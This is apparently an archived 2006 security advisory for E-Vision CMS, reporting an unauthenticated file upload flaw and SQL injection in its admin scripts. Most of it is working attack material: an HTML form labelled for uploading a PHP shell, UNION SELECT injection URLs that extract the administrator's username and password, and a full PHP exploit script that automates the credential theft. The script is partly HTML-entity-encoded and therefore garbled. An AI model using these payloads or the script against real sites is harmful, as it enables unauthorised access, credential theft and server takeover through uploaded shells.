E-Vision CMS Multible Remote injections

2006-09-23T00:00:00
ID SECURITYVULNS:DOC:14393
Type securityvulns
Reporter Securityvulns
Modified 2006-09-23T00:00:00

Description

Hello,,

E-Vision CMS Multible Remote injections (SQL and File upload)

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net

upload any file

admin/x_image.php this file is used to upload files and it does not check the permission

This file can be used to upload any file to the dir /imagebank replace http://localhost/evision_cms/ to the website dir and choose any file to upload it will be uploaded

<form enctype="multipart/form-data" action="http://localhost/evision_cms/admin/x_image.php" method="POST"> <input type=hidden name="insert" value="insert"> <input type=hidden name="s_rc" value="file://"> Upload PHP Shell : <input type="file" name="file_upload"> <br> <input type=submit value="upload">


Sql Injection Password: admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/ User Name: admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/


Exploits :- For PHP shell uploading:- <form enctype="multipart/form-data" action="http://localhost/evision_cms/admin/x_image.php" method="POST"> <input type=hidden name="insert" value="insert"> <input type=hidden name="s_rc" value="file://"> Upload PHP Shell : <input type="file" name="file_upload"> <br> <input type=submit value="upload">


For Sql injection:-

!/usr/bin/php -q -d short_open_tag=on

<? / / e-Vision CMS Remote sql injection exploit / By : HACKERS PAL / WwW.SoQoR.NeT / print_r(' /*******/ / e-Vision CMS Remote sql injection exploit / / by HACKERS PAL <security@soqor.net> / / site: http://www.soqor.net /'); if ($argc<2) { print_r(' / -- / / Usage: php '.$argv[0].' host / Example: / /* php '.$argv[0].' http://localhost/evision /*******/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);

$url=$argv[1]; $exploit="/admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/"; $exploit2="/admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/";

     Function get_page&#40;$url&#41;
     {

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }

     function get&#40;$var&#41;
     {
             if&#40;strlen&#40;$var[1]&#41;&gt;0&#41;
             {
              Echo trim&#40;$var[1]&#41;;
              }
     }

 $page = get_page&#40;$url.$exploit&#41;;
 $page2 = get_page&#40;$url.$exploit2&#41;;

 if&#40;preg_match&#40;&#39;/&#92;&lt;td bgcolor=&#92;&quot;#C2D4E8&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/td&#92;&gt;/is&#39;,$page&#41;&#41;
 {
  Echo &quot;&#92;n[+] User Name : &quot;;
     preg_replace_callback&#40;&#39;/&#92;&lt;td bgcolor=&#92;&quot;#C2D4E8&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/td&#92;&gt;/is&#39;,&#39;get&#39;,$page&#41;;
   Echo &quot;&#92;n[+] Pass Word : &quot;;
      preg_replace_callback&#40;&#39;/&#92;&lt;td bgcolor=&#92;&quot;#C2D4E8&#92;&quot;&gt;&#40;.+?&#41;&lt;&#92;/td&#92;&gt;/is&#39;,&#39;get&#39;,$page2&#41;;
    Die&#40;&quot;&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;
         }

            Die&#40;&quot;&#92;n[-] Exploit Failed&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;

?>

WwW.SoQoR.NeT